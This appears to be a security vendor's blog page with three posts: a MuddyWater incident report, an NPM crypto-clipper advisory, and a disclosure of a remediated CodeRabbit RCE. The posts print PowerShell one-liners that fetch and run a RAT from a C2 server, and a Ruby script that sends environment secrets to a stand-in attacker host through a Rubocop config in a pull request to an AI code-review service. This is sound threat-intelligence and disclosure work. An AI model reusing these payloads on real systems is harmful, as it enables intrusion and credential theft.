In late August 2025, our Incident Response team was engaged to investigate suspicious activity within a customer’s network located in the South Asia region. The initial signs pointed to a targeted intrusion, and forensic analysis quickly confirmed the involvement of MuddyWater, a threat actor publicly linked to the Iranian Ministry of Intelligence and Security (MOIS).

The attacker made use of a previously seen PowerShell-based malware, legitimate remote monitoring and management (RMM) tools, and living-off-the-land techniques to maintain access and move laterally. The activity observed was consistent with MuddyWater’s known tactics, techniques, and procedures (TTPs), as documented in prior public reporting and threat intelligence sources.

The following diagram summarizes the attack graph as observed by our incident response team:

This report outlines the findings from our investigation, including technical analysis of the attacker’s methods, Indicators of Compromise (IOCs) and malware tooling.

Threat Actor Overview: MuddyWater - Static Kitten

MuddyWater is a state-sponsored adversary attributed to the Islamic Republic of Iran, assessed with high confidence by multiple cybersecurity organizations and government agencies. Active since at least 2017, the group is known for conducting espionage-driven intrusions primarily targeting organizations across the Middle East, South Asia, Europe, and North America.

The group is tracked under various aliases by different threat intelligence vendors: Static Kitten (CrowdStrike), Seedworm (Symantec / Broadcom) or also Mercury (Microsoft).

The adversary group is known to rely on two techniques for initial access: the exploitation of internet-exposed assets and spear-phishing campaigns.

Historically, MuddyWater has been observed exploiting vulnerabilities in Microsoft Exchange and SharePoint servers to gain direct access to internal environments.

In more recent activity, the group relied on ClickFix phishing campaign, as documented by Fortinet, which leveraged malicious PowerShell payloads embedded in phishing lures to initiate multi-stage attack chains.

Incident Summary

Initial Access

During the investigation, forensic evidence confirmed that the initial compromise was achieved through the exploitation of the ToolShell vulnerability in Microsoft SharePoint (CVE-2025-53770). The affected SharePoint instance was accessible from the internet and running a vulnerable version at the time of the intrusion.

The adversary leveraged this vulnerability to gain unauthorized access and executed arbitrary commands on the underlying system. Initially, they exploited the vulnerability to try downloading a PowerShell RAT. When this failed, they continued to exploit the vulnerability for code execution and dropped file-management webshells. These webshells enabled them with upload, download and delete capabilities on filesystem.

Figure1- File management WebShell capabilities

Observed TTPs

  • File Management webshell
    The adversary leveraged a webshell with limited functionality focused solely on file management. This approach was likely intended to evade detection mechanisms that commonly flag web shells with command execution capabilities.
    The observed web shell appears to be a truncated version of a known ASPX-based web shell, specifically derived from https://github.com/xl7dev/WebShell/blob/master/Aspx/ASPX
    The adversary deployed this webshell using different methods: initially through exploitation of the Tool Shell vulnerability, and subsequently via a notepad instance on another compromised server.
  • GodPotato for Privilege Escalation
    As part of their post-exploitation activity, the adversary dropped and used the GodPotato privilege escalation tool to gain SYSTEM-level access on compromised hosts. The binary was dropped into the “C:\ProgramData\” directory, a commonly staging location observed throughout this intrusion.
    With the elevated privileges, the adversary was able to dump the LSASS process and extract credentials, leading to the compromise of a privileged domain account. Leveraging this account, the adversary proceeded with lateral movement across the network.
  • Abuse of RMM Tools: AnyDesk and PDQ
    Loyal to their established tradecraft, the adversary relied heavily on legitimate Remote Monitoring and Management (RMM) tools to maintain persistent access and carry out operations within the compromised environment. Notably, PDQ Connect was deployed across multiple hosts, alongside AnyDesk, which was used for interactive remote control.
    The attackers followed a recognizable pattern: creating new user accounts, adding them to privileged groups, and configuring AnyDesk for unattended access.
    PDQ and AnyDesk provided the adversary with the ability to push tools and payloads onto compromised hosts. These file transfers can be traced through specific artifacts on the system: %APPDATA%\Roaming\AnyDesk\file_transfer_trace.txt for AnyDesk, and PDQ.com.evtx logs for PDQ.
Figure 2 - AnyDesk file transfers
Figure3- PDQ file downloads
  • Discovery using Native Windows Tools and PowerShell Cmdlets
    As part of the reconnaissance phase, the adversary employed native Windows tools and PowerShell cmdlets to enumerate the internal environment while minimizing detection risk. This use of living-off-the-land techniques allowed them to perform host and network discovery without introducing external binaries or triggering behavioral alerts.
    Several commands were observed during this phase, including:
ping -n 2 -a <REDACTED> > ping_dc.txt
whoami
quser
Test-NetConnection <REDACTED> -Port 445
netstat -nt
  • Lateral Movement using Invoke-SMBExec and WMI
    The adversary initiated lateral movement across the environment using a combination of SMB-based remote execution and Windows ManagementInstrumentation (WMI).
    The attacker leveraged a PowerShell implementation of Invoke-SMBExec, a known lateral movement tool that allows command execution on remote systems over SMB by impersonating administrative credentials.
    The attackers embedded their PowerShell payloads directly within the script, appending the lateralization commands to the end of the Invoke-SMBExec routine. This ensured that the desired payloads were automatically executed on each targeted host when the script ran, minimizing manual interaction.
Figure4 - Invoke-SMBExec commands
  • Execution through PowerShell one-liner
    Multiple attempts were made by the adversary to execute malware via PowerShell one-liners. The high number of attempts suggests difficulty establishing outbound connectivity (possibly due to egress filtering). Firewall logs later confirmed this: multiple blocked connection attempts to the Command-and-Control (C2) server.
    The PowerShell attack chain included two stages, downloading an obfuscated payload from a remote server and saving it on the c:\users\public\downloads\ path, and then decoding and executing it on the target host.:
powershell.exe -NonInteractive -WindowStyle Hidden -ExecutionPolicy RemoteSigned -EncodedCommand <ENCODEDCOMMAND1>
powershell.exe -NonInteractive -WindowStyle Hidden -ExecutionPolicy RemoteSigned -EncodedCommand <ENCODEDCOMMAND2>

          The base64 strings are decoded to:

arvpxsmy;$arvpxsmy="arvpxsmy";Invoke-WebRequest -UseDefaultCredentials -UseBasicParsing -Uri hxxp://195[.]20.17.189:443//31133?hidemyself=<REDACTED> -OutFile  c:\users\public\downloads\test.html

zphygwvbz;$zphygwvbz="zphygwvbz";$command = "(Invoke-WebRequest -UseDefaultCredentials -UseBasicParsing -Uri hxxp://195[.]20.17.189:443//35893?time=<REDACTED>).content | Invoke-Expression";saps powershell -Wind Hi -ArgumentList $command
  • Tunneling via custom binary
    A custom tunneling tool was dropped by the adversary across multiple compromised hosts, allowing them to pivot and access internal systems that were otherwise unreachable.
    The adversary used this established tunnel to interact primarily with RDP and SMB services. This activity left behind a notable forensic artifact: Security event logs (EventID 4624) on the target systems recorded successful logons where the Workstation Name field reflected the attacker’s original machine name, rather than the internal host used as the tunneling endpoint. This served as a strong indicator of tunneling activity and allowed our team to retrace some of the attacker’s movement across the network.
Figure5 - Attacker's machine hostname in EventID 4624

A dump of the tunneling process revealed notable artifacts indicating that the adversary conducted an SMB sweep through the established proxy tunnel in an attempt to identify accessible internal hosts. This scan activity involved probing multiple IP addresses on the network over port 445 (SMB), likely to discover systems where administrative shares were exposed or lateral movement was possible.

Figure6 - SMB sweep from process dump
  • Data Exfiltration though SharePoint webserver
    The SharePoint web server was abused by the attacker as an exfiltration mechanism. After collecting sensitive credential artifacts (including the SYSTEM and SECURITY registry hives, as well as LSASS process memory dumps) the adversary compressed these files into ZIP archives and placed them into the layouts directory of the SharePoint web application.
    This approach enabled the attacker to exfiltrate the collected artifacts for offline processing and cracking.
Figure7 - Web requests logs showing exfiltration of compressed archives

Malware and Toolset Analysis

  • PowerShell RAT
    The PowerShell one-liners observed earlier served as loaders for a Remote Access Trojan (RAT). This same RAT was previously identified in the ClickFix campaign targeting Israeli organizations. Fortinet has published a comprehensive analysis of this campaign including the RAT's full functionalities. This analysis is available on this Fortinet’s blogpost.
    The only notable difference in our case was the C2 server: the RAT in this intrusion communicated with a different command-and-control address, specifically 195[.]20.17.189.
  • Custom version of resocks for tunneling
    The adversary leveraged a TLS-encrypted tunneling proxy to route traffic to internal network hosts, enabling covert communication and lateral movement across the environment. This capability was established indirectly via a binary with the Original FileName FMAPP.exe (SHA256:d4715827692a248f1fbeecd60f9a99b7bd639198e64c2f400710c52503eba1f8).
    Upon execution, this binary was observed loading a previously unknown DLL named FMAPP.dll. This DLL was amodified version of the open-source resocks proxy tool, allowing internal traffic tunneling via a reverse SOCKS5 proxy. The DLL had a hardcoded callback IP address and Port: 165[.]227.82.147:443

Infrastructure Analysis

  • 195[.]20.17.189: RAT C2 Server
    This C2 server was hosted on BlueVPS, with an IP geolocated to Israel. This may have been a deliberate lure consistent with techniques used by MuddyWater where they used region-specific infrastructure to blend in with local traffic patterns.
    The server at 195[.]20.17.189 was exposing HTTP services on ports 80 and443. Notably, port 443 presented an SSL certificate with the Subject Common Name (CN): pharmacynod.com, the same domain previously observed in the ClickFix campaign documented by Fortinet. This overlap reinforces the link between the adversary behind both operations.
  • 165[.]227.82.147: Reverse Proxy Callback Address
    This IP was the callback server for the custom resocks binary on port 443.
    Few weeks after the initial compromise, on September 9, a notable change in the behavior of this IP was observed. The original TLS service on port 443 was replaced with a SimpleHTTPServer instance (Python) exposed over HTTP before being taken offline, suggesting a possible shift in the infrastructure's purpose.
    This change may indicate a reuse in the infrastructure for another phase or campaign or simple an OPSEC error, exposing tools unintentionally.
Figure8- Directory listing on 165[.]227.82.147

Final Thoughts

Despite changes in tooling or infrastructure, MuddyWater/Static Kitten continues to rely on a well-established set of Tactics, Techniques, and Procedures (TTPs) observed globally across multiple campaigns. Their playbook still includes exploitation of public-facing applications, phishing, abuse of legitimate remote access tools and lateral movement using native Windows utilities.

Mitre ATT&CK TTPs Table

Tactic

Technique

Technique ID

Comments

Initial Access

Exploit Public-Facing Application

T1190

Exploitation of CVE-2025-53770 in Microsoft SharePoint for initial access.

Execution

PowerShell

T1059.001

Execution of obfuscated PowerShell one-liners for malware delivery and command execution.

Command and Scripting Interpreter

T1059

General use of scripting via PowerShell for execution and automation.

Persistence

Create Account

T1136

New local user accounts created for persistent access.

Remote Access Software

T1219

Use of AnyDesk and PDQ for remote access and persistence.

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Privilege escalation with GodPotato

Defense Evasion

Masquerading

T1036

Custom tunneling tool disguised with misleading filenames (e.g., FMAPP.exe).

Credential Access

OS Credential Dumping

T1003

Dumping of LSASS process memory and extraction of domain credentials.

Discovery

System Network Configuration Discovery

T1016

Use of PowerShell and network tools for host discovery.

Account Discovery

T1087

Discovery of users and groups via native commands.

Lateral Movement

Remote Services: SMB/Windows Admin Shares

T1021.002

Lateral movement via SMB using Invoke-SMBExec.

Windows Management Instrumentation (WMI)

T1047

Remote command execution using WMI.

Command and Control

Application Layer Protocol: Web Protocols

T1071.001

Communication with C2 over HTTP/S (port 443).

Encrypted Channel

T1573

TLS-encrypted traffic through resocks tunneling tool.

Exfiltration

Exfiltration Over Web Service

T1567.002

Exfiltration via uploading data to SharePoint webserver.
Advisory
Security Advisory
September 9, 2025

NPM Supply Chain Attack

Kudelski Security Team

Summary

A significant supply chain attack has compromised the NPM account of the developer known as qix, leading to the distribution of malicious versions of numerous widely used packages. This attack has affected packages with a combined weekly download count exceeding 2-3 billion, posing a substantial threat to the JavaScript ecosystem. The malicious code, identified as a crypto-clipper, is designed to intercept and manipulate cryptocurrency transactions by swapping wallet addresses and hijacking transactions.

Affected Systems and/or Applications

The attack primarily targets the following NPM packages, which are widely used across various projects:

The GitHub code repositories for these packages were not affected; the attack was confined to the NPM registry.

Technical Details

1. Phishing Attack

  • The attack began with a phishing email sent from a domain impersonating npmjs.com ([email protected]). This email was designed to trick the package maintainer into providing their credentials, including two-factor authentication (2FA) codes.
  • The phishing email contained a link to a malicious site that mimicked the legitimate npmjs.com, capturing the credentials entered by the victim.

2. Account Compromise

  • Once the attacker obtained the credentials, they gained access to the NPM account of the maintainer, allowing them to publish malicious versions of popular packages.

3. Malware Injection

  • The attacker injected a crypto-stealing malware into the index.js files of the compromised packages. This malware is a sophisticated browser-based interceptor that hooks into JavaScript functions like fetch, XMLHttpRequest, and wallet APIs (window.ethereum, Solana, etc.).

4. Malware Functionality

  • Network Traffic Interception: The malware hooks into network functions to intercept and manipulate data. It scans for cryptocurrency addresses in network responses and replaces them with attacker-controlled addresses using a Levenshtein distance algorithm to find visually similar addresses.
  • Transaction Hijacking: For Ethereum and Solana transactions, the malware modifies transaction parameters such as recipients and approval targets before they are signed by the user. This ensures that funds are redirected to the attacker's wallet.
  • Stealth Operations: The malware operates stealthily by avoiding obvious changes in the user interface, making it difficult for users to detect the compromise.

5. Technical Implementation

  • The malware uses obfuscated JavaScript code to evade detection and analysis. It employs techniques like monkey-patching to override native functions and inject malicious logic.
  • It checks for the presence of window.ethereum to determine if a crypto wallet is being used, and if so, it hooks into the wallet's communication methods (request, send, sendAsync).

Mitigation

1. Audit Dependencies: Developers should immediately audit their project's dependencies to identify and remove any compromised packages. This includes checking node_modules and package-lock.json for malicious code. As a direct method of detection, you can scan your node_modules directory for the malicious code using this command, which searches for a unique string found in the payload: grep -r "const _0x112" node_modules/

2. Pin Safe Versions: Use the overrides feature in package.json to pin affected packages to their last known-safe versions. For example:

{
"name": "your-project",
"version": "1.0.0",
"overrides": {
"chalk": "5.3.0",
"strip-ansi": "7.1.0",
"color-convert": "2.0.1",
"color-name": "1.1.4",
"error-ex": "1.3.2",
"has-ansi": "5.0.1"
}

3. Reinstall Dependencies: Delete node_modules and package-lock.json, then run npm install to generate a new, clean lockfile.

4. Verify Transactions: Users should meticulously verify all cryptocurrency transactions to ensure the recipient addresses are correct. See this GitHub Gist for a list of all wallets.

5. Monitor for Indicators of Compromise: Check for the presence of the function checkethereumw in your codebase as an indicator of compromise.

References

AI Security
August 19, 2025

How We Exploited CodeRabbit: From a Simple PR to RCE and Write Access on 1M Repositories

Nils Amiet

In this blog post, we explain how we got remote code execution (RCE) on CodeRabbit’s production servers, leaked their API tokens and secrets, how we could have accessed their PostgreSQL database, and how we obtained read and write access to 1 million code repositories, including private ones.

This blog post is a detailed write-up of one of the vulnerabilities we disclosed at Black Hat USA this year. The details provided in this post are meant to demonstrate how these security issues can manifest and be exploited in the hopes that others can avoid similar issues. This is not meant to shame any particular vendor; it happens to everyone. Security is a process, and avoiding vulnerabilities takes constant vigilance.

Note: The security issues documented in this post were quickly remediated in January of 2025. We appreciate CodeRabbit’s swift action after we reported this security vulnerability. They reported to us that within hours, they addressed the issue and strengthened their overall security measures responding with the following:

  • They confirmed the vulnerability and immediately began remediation, starting by disabling Rubocop until a fix was in place.
  • All potentially impacted credentials and secrets were rotated within hours.
  • A permanent fix was deployed to production, relocating Rubocop into their secure sandbox environment.
  • They carried out a full audit of their systems to ensure no other services were running outside of sandbox protections, automated sandbox enforcement to prevent recurrence, and added hardened deployment gates.

More information from CodeRabbit on their response can be found here: https://www.coderabbit.ai/blog/our-response-to-the-january-2025-kudelski-security-vulnerability-disclosure-action-and-continuous-improvement

Introduction

Last December, I spoke at 38C3 in Hamburg and covered 2 security flaws I discovered in Qodo Merge. After getting off the stage, someone came to me and asked whether I had looked at other AI code review tools, such as CodeRabbit. I thanked them and said this would be a great target to have a look at. Fast forward a couple of weeks, and here I am, having a look at their security.

What is CodeRabbit?

CodeRabbit front page

CodeRabbit is an AI code review tool. Their website mentions it’s the most installed AI app on GitHub & Gitlab, with 1 million repositories in review and 5 million pull requests reviewed.

1 million repositories in review

Indeed, the application is the most installed GitHub app in the AI Assisted category on GitHub Marketplace. It is also on the first page of the most installed GitHub apps overall across all categories on GitHub Marketplace.

CodeRabbit is the most installed AI-assisted app on GitHub marketplace

Once CodeRabbit is installed on a repository, every time a new pull request (PR) is created or updated, the application will analyze the code changes in the PR and review them using AI. CodeRabbit will finally post its code review as a comment on the pull request, where the developer can read it.

This is a very useful developer productivity tool that can summarize PRs, find security issues in the code, suggest code improvements or even document the code or illustrate it by generating diagrams. It can save developers a lot of time.

Trying it out

There are multiple pricing plans, and one of them is called Pro. That one includes support for linters and SAST tools, such as Semgrep. Alternatively, there’s a free 14-day trial for the Pro plan. Also, the Pro plan comes for free for people working on open source projects.

CodeRabbit pricing

I registered for the free trial and logged in using my GitHub account.

Login with GitHub

When first logging into CodeRabbit using GitHub, the application asks to install and authorize on a personal GitHub account. The user is asked to select which repositories the application should be installed to. The user can also review the permissions that the CodeRabbit GitHub app will be granted. Namely, read and write access to code in the selected repositories.

Installing CodeRabbit on a personal GitHub account

At this point, this sounded very similar to what happened with Qodo Merge. I had to look into it. If somehow we could leak the GitHub API token, we would get read and write access to the repository in which CodeRabbit was installed.

I immediately created a private GitHub repository on my personal GitHub account and granted the application access to that new repository so that it starts reviewing my PRs on that repo.

In order to get more familiar with the features and how to use them, I created a PR and saw that a comment containing a code review was posted by the CodeRabbit bot. Here are a few screenshots of what it generated.

CodeRabbit explains what the PR does
CodeRabbit can find security issues in your code and suggest improvements
CodeRabbit even generated a diagram that explained how the app worked

Now that I had a better idea of how it worked, I could start looking for vulnerabilities.

Exploiting external tools

I had a look at the official documentation and noticed that CodeRabbit supported running dozens of static analysis tools. These are the linters and SAST tools mentioned on the pricing page discussed above.

The application runs these tools on your PR changes depending on a few conditions:

  • The tool is enabled in the CodeRabbit configuration
  • The PR contains large enough changes to trigger a run of such tools. Small changes will be ignored and no tool will run on those
  • The PR contains files supported by the tool. For example, PHPStan will only run on files with the .php extension

Some tools are enabled by default and will run if corresponding files exist. Otherwise, a .coderabbit.yaml file placed in the repository can be used to configure which tools should be enabled. Alternatively, the CodeRabbit web app settings can be used to configure tools.

The documentation page also states that each tool can be configured by providing a path to a configuration file read by the tool. Now we’re talking!

Since CodeRabbit executes these external tools, if any of these tools have a way to inject code, we may be able to run arbitrary code. So I glanced over the list of supported tools and found an interesting target: Rubocop, a Ruby static analyzer. The CodeRabbit documentation page for Rubocop states that Rubocop will run on Ruby files (.rb) in the repository. It also says that CodeRabbit will look for a .rubocop.yml file anywhere in the repository and pass it to Rubocop.

Rubocop runs on Ruby files (.rb)
Source: CodeRabbit documentation
CodeRabbit looks for Rubocop config files anywhere in the repository and, if found, passes it to Rubocop
Source: CodeRabbit documentation


Looking at Rubocop’s documentation, we see that it supports extensions. One can use the Rubocop configuration file to specify the path to an extension Ruby file, for example, ext.rb, which will be loaded and executed by Rubocop. To do so, one can include the following snippet in .rubocop.yml:

require:
- ./ext.rb

In ext.rb, we can write arbitrary Ruby code that will be loaded and executed when Rubocop runs. We’ll use 1.2.3.4 as an example IP address that stands in for an attacker-controlled system. For example, the following Ruby script will collect the environment variables and send them to an attacker-controlled server at 1.2.3.4:

require 'net/http'
require 'uri'
require 'json'
 
# Collect environment variables
env_vars = ENV.to_h
 
# Convert environment variables to JSON format
json_data = env_vars.to_json
 
# Define the URL to send the HTTP POST request
url = URI.parse('http://1.2.3.4/')
 
begin
  # Create the HTTP POST request
  http = Net::HTTP.new(url.host, url.port)
  request = Net::HTTP::Post.new(url.path)
  request['Content-Type'] = 'application/json'
  request.body = json_data
 
  # Send the request
  response = http.request(request)
rescue StandardError => e
  puts "An error occurred: #{e.message}"
end

Exploiting this is as simple as following these steps:

  • Get a free trial on CodeRabbit and register using a personal GitHub account
  • Create a private repository and grant the application access to it, so that it reviews PRs on that repository
  • Create a PR that contains the following files:
    • A .rubocop.yml file as shown above
    • An ext.rb file as shown above
    • Any other large enough dummy Ruby file so that CodeRabbit triggers the execution of Rubocop and does not skip the file
  • Wait for CodeRabbit to perform the code review and run our malicious ext.rb file
  • Collect the exfiltrated environment variables in the HTTP POST request received on our attacker-controlled server at 1.2.3.4

Here’s an illustration of our malicious pull request to better understand how it works:

An illustration of what the malicious pull request looks like

Unpacking what we found

After we created our malicious PR, CodeRabbit ran Rubocop on our code, which executed our malicious code and sent its environment variables to our server at 1.2.3.4.

On the server at 1.2.3.4, the following JSON payload containing environment variables was received:

{
  "ANTHROPIC_API_KEYS": "sk-ant-api03-(CENSORED)",
  "ANTHROPIC_API_KEYS_FREE": "sk-ant-api03-(CENSORED)",
  "ANTHROPIC_API_KEYS_OSS": "sk-ant-api03-(CENSORED)",
  "ANTHROPIC_API_KEYS_PAID": "sk-ant-api03-(CENSORED)",
  "ANTHROPIC_API_KEYS_TRIAL": "sk-ant-api03-(CENSORED)",
  "APERTURE_AGENT_ADDRESS": "(CENSORED)",
  "APERTURE_AGENT_KEY": "(CENSORED)",
  "AST_GREP_ESSENTIALS": "ast-grep-essentials",
  "AST_GREP_RULES_PATH": "/home/jailuser/ast-grep-rules",
  "AWS_ACCESS_KEY_ID": "",
  "AWS_REGION": "",
  "AWS_SECRET_ACCESS_KEY": "",
  "AZURE_GPT4OMINI_DEPLOYMENT_NAME": "",
  "AZURE_GPT4O_DEPLOYMENT_NAME": "",
  "AZURE_GPT4TURBO_DEPLOYMENT_NAME": "",
  "AZURE_O1MINI_DEPLOYMENT_NAME": "",
  "AZURE_O1_DEPLOYMENT_NAME": "",
  "AZURE_OPENAI_API_KEY": "",
  "AZURE_OPENAI_ENDPOINT": "",
  "AZURE_OPENAI_ORG_ID": "",
  "AZURE_OPENAI_PROJECT_ID": "",
  "BITBUCKET_SERVER_BOT_TOKEN": "",
  "BITBUCKET_SERVER_BOT_USERNAME": "",
  "BITBUCKET_SERVER_URL": "",
  "BITBUCKET_SERVER_WEBHOOK_SECRET": "",
  "BUNDLER_ORIG_BUNDLER_VERSION": "BUNDLER_ENVIRONMENT_PRESERVER_INTENTIONALLY_NIL",
  "BUNDLER_ORIG_BUNDLE_BIN_PATH": "BUNDLER_ENVIRONMENT_PRESERVER_INTENTIONALLY_NIL",
  "BUNDLER_ORIG_BUNDLE_GEMFILE": "BUNDLER_ENVIRONMENT_PRESERVER_INTENTIONALLY_NIL",
  "BUNDLER_ORIG_GEM_HOME": "BUNDLER_ENVIRONMENT_PRESERVER_INTENTIONALLY_NIL",
  "BUNDLER_ORIG_GEM_PATH": "BUNDLER_ENVIRONMENT_PRESERVER_INTENTIONALLY_NIL",
  "BUNDLER_ORIG_MANPATH": "BUNDLER_ENVIRONMENT_PRESERVER_INTENTIONALLY_NIL",
  "BUNDLER_ORIG_PATH": "/pnpm:/usr/local/go/bin:/root/.local/bin:/swift/usr/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin",
  "BUNDLER_ORIG_RB_USER_INSTALL": "BUNDLER_ENVIRONMENT_PRESERVER_INTENTIONALLY_NIL",
  "BUNDLER_ORIG_RUBYLIB": "BUNDLER_ENVIRONMENT_PRESERVER_INTENTIONALLY_NIL",
  "BUNDLER_ORIG_RUBYOPT": "BUNDLER_ENVIRONMENT_PRESERVER_INTENTIONALLY_NIL",
  "CI": "true",
  "CLOUD_API_URL": "https://(CENSORED)",
  "CLOUD_RUN_TIMEOUT_SECONDS": "3600",
  "CODEBASE_VERIFICATION": "true",
  "CODERABBIT_API_KEY": "",
  "CODERABBIT_API_URL": "https://(CENSORED)",
  "COURIER_NOTIFICATION_AUTH_TOKEN": "(CENSORED)",
  "COURIER_NOTIFICATION_ID": "(CENSORED)",
  "DB_API_URL": " https://(CENSORED)",
  "ENABLE_APERTURE": "true",
  "ENABLE_DOCSTRINGS": "true",
  "ENABLE_EVAL": "false",
  "ENABLE_LEARNINGS": "",
  "ENABLE_METRICS": "",
  "ENCRYPTION_PASSWORD": "(CENSORED)",
  "ENCRYPTION_SALT": "(CENSORED)",
  "FIREBASE_DB_ID": "",
  "FREE_UPGRADE_UNTIL": "2025-01-15",
  "GH_WEBHOOK_SECRET": "(CENSORED)",
  "GITHUB_APP_CLIENT_ID": "(CENSORED)",
  "GITHUB_APP_CLIENT_SECRET": "(CENSORED)",
  "GITHUB_APP_ID": "(CENSORED)",
  "GITHUB_APP_NAME": "coderabbitai",
  "GITHUB_APP_PEM_FILE": "-----BEGIN RSA PRIVATE KEY-----\n(CENSORED)-\n-----END RSA PRIVATE KEY-----\n",
  "GITHUB_CONCURRENCY": "8",
  "GITHUB_ENV": "",
  "GITHUB_EVENT_NAME": "",
  "GITHUB_TOKEN": "",
  "GITLAB_BOT_TOKEN": "(CENSORED)",
  "GITLAB_CONCURRENCY": "8",
  "GITLAB_WEBHOOK_SECRET": "",
  "HOME": "/root",
  "ISSUE_PROCESSING_BATCH_SIZE": "30",
  "ISSUE_PROCESSING_START_DATE": "2023-06-01",
  "JAILUSER": "jailuser",
  "JAILUSER_HOME_PATH": "/home/jailuser",
  "JIRA_APP_ID": "(CENSORED)",
  "JIRA_APP_SECRET": "(CENSORED)",
  "JIRA_CLIENT_ID": "(CENSORED)",
  "JIRA_DEV_CLIENT_ID": "(CENSORED)",
  "JIRA_DEV_SECRET": "(CENSORED)",
  "JIRA_HOST": "",
  "JIRA_PAT": "",
  "JIRA_SECRET": "(CENSORED)",
  "JIRA_TOKEN_URL": "https://auth.atlassian.com/oauth/token",
  "K_CONFIGURATION": "pr-reviewer-saas",
  "K_REVISION": "pr-reviewer-saas-(CENSORED)",
  "K_SERVICE": "pr-reviewer-saas",
  "LANGCHAIN_API_KEY": "(CENSORED)",
  "LANGCHAIN_PROJECT": "default",
  "LANGCHAIN_TRACING_SAMPLING_RATE_CR": "50",
  "LANGCHAIN_TRACING_V2": "true",
  "LANGUAGETOOL_API_KEY": "(CENSORED)",
  "LANGUAGETOOL_USERNAME": "(CENSORED)",
  "LD_LIBRARY_PATH": "/usr/local/lib:/usr/lib:/lib:/usr/libexec/swift/5.10.1/usr/lib",
  "LINEAR_PAT": "",
  "LLM_PROVIDER": "",
  "LLM_TIMEOUT": "300000",
  "LOCAL": "false",
  "NODE_ENV": "production",
  "NODE_VERSION": "22.9.0",
  "NPM_CONFIG_REGISTRY": "http://(CENSORED)",
  "OAUTH2_CLIENT_ID": "",
  "OAUTH2_CLIENT_SECRET": "",
  "OAUTH2_ENDPOINT": "",
  "OPENAI_API_KEYS": "sk-proj-(CENSORED)",
  "OPENAI_API_KEYS_FREE": "sk-proj-(CENSORED)",
  "OPENAI_API_KEYS_OSS": "sk-proj-(CENSORED)",
  "OPENAI_API_KEYS_PAID": "sk-proj-(CENSORED)",
  "OPENAI_API_KEYS_TRIAL": "sk-proj-(CENSORED)",
  "OPENAI_BASE_URL": "",
  "OPENAI_ORG_ID": "",
  "OPENAI_PROJECT_ID": "",
  "PATH": "/pnpm:/usr/local/go/bin:/root/.local/bin:/swift/usr/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin",
  "PINECONE_API_KEY": "(CENSORED)",
  "PINECONE_ENVIRONMENT": "us-central1-gcp",
  "PNPM_HOME": "/pnpm",
  "PORT": "8080",
  "POSTGRESQL_DATABASE": "(CENSORED)",
  "POSTGRESQL_HOST": "(CENSORED)",
  "POSTGRESQL_PASSWORD": "(CENSORED)",
  "POSTGRESQL_USER": "(CENSORED)",
  "PWD": "/inmem/21/d277c149-9d6a-4dde-88cc-03f724b50e2d/home/jailuser/git",
  "REVIEW_EVERYTHING": "false",
  "ROOT_COLLECTION": "",
  "SELF_HOSTED": "",
  "SELF_HOSTED_KNOWLEDGE_BASE": "",
  "SELF_HOSTED_KNOWLEDGE_BASE_BRANCH": "",
  "SENTRY_DSN": "https://(CENSORED)",
  "SERVICE_NAME": "pr-reviewer-saas",
  "SHLVL": "0",
  "TELEMETRY_COLLECTOR_URL": "https://(CENSORED)",
  "TEMP_PATH": "/inmem",
  "TINI_VERSION": "v0.19.0",
  "TRPC_API_BASE_URL": "https://(CENSORED)",
  "VECTOR_COLLECTION": "",
  "YARN_VERSION": "1.22.22",
  "_": "/usr/local/bin/rubocop"
}

That payload contained so many secrets that it actually took me a few minutes to grasp what we had gotten access to. The environment variables contained, notably:

  • Anthropic API keys (free, oss, paid, trial, etc.)
  • OpenAI API keys (free, oss, paid, trial, etc.)
  • Aperture agent key
  • Courier auth token
  • Encryption password and salt
  • Gitlab personal access token
  • CodeRabbit GitHub App private key, app client id, app client secret, app id
  • Jira secret
  • Langchain/langsmith API key
  • LanguageTool API key
  • Pinecone API key
  • PostgreSQL database host, username and password

Leaking environment variables is one thing, but since we obtained remote code execution (RCE) on that server, there is even more that an attacker could have done. Indeed, they could connect to the Postgres database server on the internal network. They could perform destructive operations. They could likely obtain the source code of the CodeRabbit app itself which is potentially somewhere in the Docker container where the external tool runs.

Before exploring the leaked environment variables further, we performed a few minimal reconnaissance operations, such as listing a few directories and reading the contents of a couple files on the production system, just to confirm the impacts. But this process was not really efficient and we were not able to quickly confirm the presence of the original source code of the webapp there. However, the built application was there in the /app/pr-reviewer-saas/dist directory.
Additionally, since this was a production server, we didn’t want to do anything that could disrupt the service and decided to stop there.
But there was more. Let’s go back to the exfiltrated environment variables.

Getting Read/write access to 1M repositories

As mentioned above, one of the environment variables was named GITHUB_APP_PEM_FILE and its value contained a private key. This is actually the private key of the CodeRabbit GitHub app. This private key can be used to authenticate to the GitHub REST API and act on behalf of the CodeRabbit GitHub app. Since users have granted CodeRabbit write access to their repositories, this private key gives us write access to 1 million repositories!

Let’s go through a few operations that one can perform with this private key.

Listing the installations

As of this writing, the CodeRabbit GitHub app was installed over 80’000 times. Basically, this tells us that at least that amount of GitHub personal accounts or organizations installed CodeRabbit and use it for at least one of their repositories. But these accounts may very well have granted access to more than one repository, or even all of their repositories.

The website states that they review 1M repositories. These include GitHub repositories, but likely also repositories from other platforms that CodeRabbit supports, such as Gitlab, and on-premises git providers.

We will see below (see Proof of concept) how one can programatically list GitHub app installations using the GitHub API.

Listing GitHub repositories the application has access to

For a given installation, one can list the GitHub repositories to which this installation has been granted access.

We can also see that the installation has read/write access to the code of the repository, among other permissions. For reference, this is the list of permissions the CodeRabbit app has on the repositories it has access to:

"permissions": {
    "actions": "read",
    "checks": "read",
    "contents": "write",
    "discussions": "read",
    "issues": "write",
    "members": "read",
    "metadata": "read",
    "pull_requests": "write",
    "statuses": "write"
  },

Note that these permissions are public information that anyone can see here.

Generating an access token

A GitHub API access token can be created for the CodeRabbit app installation. This access token has all the permissions listed above and can be used on all the repositories the app installation has access to. It can be used to, for example, clone the repository or push git commits to it, since we not only have read access but also write access to the contents. This can also be used to update GitHub releases, including the downloadable files (the assets), and replace them with malware and therefore serve malware directly from the targeted official GitHub repository.

The access token is valid for at most 10 minutes, but since we have the private key, more access tokens can be generated at any time, even if they expire.

Cloning private repositories

But this gets even scarier. Generated access tokens can also be used to clone private repositories (!) that the user has granted CodeRabbit access to. Indeed, as long as the user has granted CodeRabbit access to a repository, the private key can be used to access it. It doesn’t matter if it’s public or private.
